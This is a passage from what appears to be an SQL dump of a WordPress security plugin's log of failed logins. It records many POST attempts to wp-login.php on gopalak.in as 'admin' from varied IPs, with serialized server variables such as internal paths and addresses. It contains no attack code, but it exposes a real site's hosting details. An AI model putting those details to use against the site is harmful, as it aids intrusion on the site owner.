br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55018\";s:11:\"REMOTE_ADDR\";s:14:\"212.227.26.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744982063.3551929;s:12:\"REQUEST_TIME\";i:1744982063;}}','212.227.26.126',0,'2025-04-18 18:44:25','1970-01-01 00:00:00'),(93823,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42662\";s:11:\"REMOTE_ADDR\";s:14:\"107.172.243.11\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744982768.6690321;s:12:\"REQUEST_TIME\";i:1744982768;}}','107.172.243.11',0,'2025-04-18 18:56:10','1970-01-01 00:00:00'),(93824,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57434\";s:11:\"REMOTE_ADDR\";s:13:\"51.178.81.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744983477.8825569;s:12:\"REQUEST_TIME\";i:1744983477;}}','51.178.81.248',0,'2025-04-18 19:07:59','1970-01-01 00:00:00'),(93825,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42672\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.122.90\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744984192.839823;s:12:\"REQUEST_TIME\";i:1744984192;}}','68.65.122.90',0,'2025-04-18 19:19:54','1970-01-01 00:00:00'),(93826,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37214\";s:11:\"REMOTE_ADDR\";s:15:\"134.122.118.246\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744984913.9021709;s:12:\"REQUEST_TIME\";i:1744984913;}}','134.122.118.246',0,'2025-04-18 19:31:55','1970-01-01 00:00:00'),(93827,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37574\";s:11:\"REMOTE_ADDR\";s:13:\"192.34.56.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744985634.6550879;s:12:\"REQUEST_TIME\";i:1744985634;}}','192.34.56.148',0,'2025-04-18 19:43:56','1970-01-01 00:00:00'),(93828,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48322\";s:11:\"REMOTE_ADDR\";s:13:\"81.177.140.54\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744987076.790498;s:12:\"REQUEST_TIME\";i:1744987076;}}','81.177.140.54',0,'2025-04-18 20:07:58','1970-01-01 00:00:00'),(93829,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51610\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.137.231\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744987798.1775601;s:12:\"REQUEST_TIME\";i:1744987798;}}','66.29.137.231',0,'2025-04-18 20:20:01','1970-01-01 00:00:00'),(93830,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54604\";s:11:\"REMOTE_ADDR\";s:12:\"62.60.160.33\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744988524.510778;s:12:\"REQUEST_TIME\";i:1744988524;}}','62.60.160.33',0,'2025-04-18 20:32:06','1970-01-01 00:00:00'),(93831,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56978\";s:11:\"REMOTE_ADDR\";s:15:\"217.182.158.226\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744989256.2328999;s:12:\"REQUEST_TIME\";i:1744989256;}}','217.182.158.226',0,'2025-04-18 20:44:18','1970-01-01 00:00:00'),(93832,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38738\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.215.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744989990.1001539;s:12:\"REQUEST_TIME\";i:1744989990;}}','162.0.215.190',0,'2025-04-18 20:56:31','1970-01-01 